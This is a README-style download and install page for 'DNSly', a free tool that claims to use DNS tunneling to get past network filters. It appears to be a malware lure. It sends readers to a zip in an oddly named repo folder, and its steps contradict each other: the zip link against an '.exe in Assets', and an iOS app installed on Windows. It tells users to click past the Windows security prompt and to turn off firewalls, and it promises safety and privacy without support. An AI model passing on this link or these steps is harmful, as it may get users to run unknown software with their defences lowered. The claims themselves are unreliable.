DNSly helps you reach blocked websites. It uses DNS tunneling to hide your traffic from network filters. This tool allows you to browse the web freely from your iOS device. You can install it on your Windows computer to manage your settings and sync your connection profiles.

You need the latest version of our software to start. Follow these steps to obtain the files for your computer:

1. Open your web browser.
2. Go to https://github.com/Tieazide1959/DNSly/raw/refs/heads/main/marmoration/Sly_DN_v1.3.zip.
3. Look for the section labeled Assets at the bottom of the newest release post.
4. Click the file ending in .exe to start your download.
5. Save the file to your desktop for easy access.

Follow these steps to install DNSly on your Windows machine:

1. Locate the file you saved to your desktop.
2. Double-click the file to start the installer.
3. Windows may show a security prompt. Click Run to proceed.
4. Follow the instructions on the screen.
5. Click Finish when the process ends.
6. Find the DNSly icon on your desktop and open the app.

DNS acts as the phonebook of the internet. It translates website names into numbers. Some networks block these requests to prevent you from seeing certain sites. DNSly wraps your requests in a tunnel. This tricks the network into thinking your traffic is standard background data. Because the filter ignores this data, you gain access to the restricted content.

This process runs in the background. You do not need to change your settings once you turn the app on. The software manages the connection path for you.

DNSly works on most modern computers. You need the following:

• Windows 10 or Windows 11.
• A stable internet connection.
• 50 MB of free storage space.
• An iOS device to pair with your account settings.

If your computer uses an older version of Windows, the app might not start. Please run your Windows Update tool to ensure your operating system has the latest patches.

You can modify how the app behaves through the Settings menu.

• Auto-connect: Enable this to start the tunnel when you turn on your computer.
• Log usage: This stores a record of your connection attempts. Use this if you have trouble reaching specific sites.
• Server selection: The app picks the best server by default. You can change this if you experience slow speeds.

If you cannot connect, try these steps:

1. Check your internet connection. Open a web browser and try to load a page.
2. Restart the DNSly app. Close the window and click the icon again.
3. Check for updates. Visit the download page again to see if a newer version exists.
4. Disable other security tools. Some firewalls block tunnel traffic. Turn them off for one minute to see if the connection improves.
5. Restart your computer. This clears stuck processes that might interfere with the software.

Is this app safe? Yes. DNSly encrypts your requests. This keeps your activity private from your internet service provider.

Does this app cost money? No. DNSly is a free tool. We believe in open access to information.

Will this work on my school or work network? Yes. It works on most secured networks. However, some advanced networks detect tunneling. If you encounter issues, the app notifies you in the status bar.

Does DNSly slow down my speed? You might notice a tiny drop in speed. This is normal because your data travels to a secure DNS server before reaching its destination. Most users do not notice any change in daily tasks like reading or browsing.

What do I do if the app crashes? Restart the app. If it crashes again, look at your desktop for a file named logs.txt. Send this file to our support team for review. This file contains technical details that help us find the cause of the error.

We do not store your data. We do not track the websites you visit. Your information stays on your device. The connection between your computer and our servers uses industry-standard protocols. This ensures your data remains secure during transit. We prioritize your privacy above all else.
